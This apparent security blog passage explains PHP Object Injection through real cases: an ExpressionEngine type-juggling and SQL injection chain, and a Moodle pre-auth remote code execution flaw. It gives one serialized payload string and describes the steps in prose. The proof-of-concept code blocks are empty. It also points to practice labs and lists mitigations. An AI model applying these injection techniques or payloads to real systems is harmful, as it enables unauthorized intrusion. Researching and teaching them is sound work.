Using the obtained knowledge about the small ‘o’ as an option, the security researcher constructed a bypass that allowed them to tamper with any ‘order’ object. In addition, when paired with capital ‘S’, existing firewall rules failed, causing the firewall to be bypassed.

Proof of Concept Code:

Type Juggling Chained with PHP Object Injection for SQL Injection

ExpressionEngine is a robust and flexible open-source Content Management System. ExpressionEngine has a large community of developers making add-ons that extend system capabilities.

In this scenario, when the security researcher attempted to log in with the username ‘admin,’ the server responded with a cookie containing PHP serialized data. The researcher then downloaded and installed a copy of the application for further analysis. After walking through the code, the researcher discovered that a few checks were done before the cookie was parsed and subsequently unserialized. Further investigation revealed that a cookie integrity validation mechanism was in place, ensuring that the cookie was not tampered with. Since the application was written in PHP, a loosely typed language, using the loose comparison operator resulted in the comparison evaluating as true because ‘0ex’ will always be zero when cast to integers, a process known as Type Juggling.

The researcher then created the following proof of concept, which brute forces the ‘md5($payload.$this->sess_crypt_key)’ until an MD5 hash sum of the updated ‘$payload’ and ‘$this->sess_crypt_key’ that starts with ‘0e’ and ends in all digits was discovered:

Proof of Concept Code:

Output:

When the researcher compared the MD5 hash sum to any ‘$signature’ value, they discovered that the original ‘$payload’ was successfully updated, confirming the existence of Type Juggling and PHP Object Injection.

The researcher discovered a method that appears to be checking the database to see if the given ‘$username’ is locked out pre-authentication. Since the researcher got access to the value of ‘$username’ and he was able to inject a SQL query there, it resulted in SQL injection.

Following an additional inspection of the source code and multiple hit-and-try efforts, the researcher constructed the Proof of concept code shown below to insert the ‘sleep(5)’ command into the database:

Proof of Concept Code:

 

Output:

The researcher then submitted the below-mentioned payload through the ‘exp_flash’ cookie generated by the preceding proof of concept code and observed that the response was shown after 5 seconds, confirming the vulnerability:

Object Injection to Pre-Auth Remote Code Execution in Moodle

Moodle is a learning platform that aims to give educators, administrators, and learners a unified, secure, and integrated system for creating personalized learning environments.

In this scenario, the researcher discovered that Moodle’s Shibboleth authentication module was vulnerable to Remote Code Execution through a PHP Object Injection vulnerability. The vulnerability was discovered in the logout handler in the ‘logout_file_session’ function spanning from line 17 to line 22, since the file handler traverses all session files. Each session file holds a single serialized session object. The handler handles this by reading each file and deserializing its data using the ‘unserializesession’ function. When a matching session ID in a session object is identified, the relevant file is unlinked, resulting in a ‘logged-out’ session, as shown in the below-mentioned code snippet:

The code fails to properly parse the serialized value of a session key if it contains an unexpected Pipe ‘|’ character, introducing the risk of the parser misinterpreting the beginning and end of a serialized value within the session object, leading to the deserialization of potentially user-controlled input.

The researcher sent the payload ‘xxx|O:8:”Evil”:0:{}’ which was saved in the ‘$_SESSION’ object of an unauthenticated guest user, which the session handler then serialized and stored on the filesystem in the form ‘USER|O:8:”stdClass”:…:{…} SESSION|O:8:”stdClass”:…:{… s:…:”filterfirstname”;s:19:”xxx|O:8:”Evil”:0:{}”;…}’, confirming the PHP Object Injection vulnerability which was then exploited for obtaining Remote Code Execution.

Practice Labs

Being a team of Advanced Penetration Testers and Security Researchers, we strongly believe in a hands-on approach to cyber security and therefore we have published a compilation of four PHP Objection labs on our platform Vulnmachines for the readers to learn PHP Object Injection by practicing in labs that mimic real-life circumstances. 

The practice labs relevant to PHP Object Injection are listed below and can be accessed by navigating to Vulnmachines:

  • Demystifying PHP Object Injection (Why So Serialize)

Mitigations and Best Practices

  • Deserializing user input should be avoided unless necessary.

  • When deserializing data from untrusted sources, avoid using the ‘unserialize()’ method with user-supplied input and instead use the ‘json_decode()’ and ‘json_encode()’ methods.

  • Implement a verification mechanism for serialized data before deserializing it from any untrusted source, such as user input.

References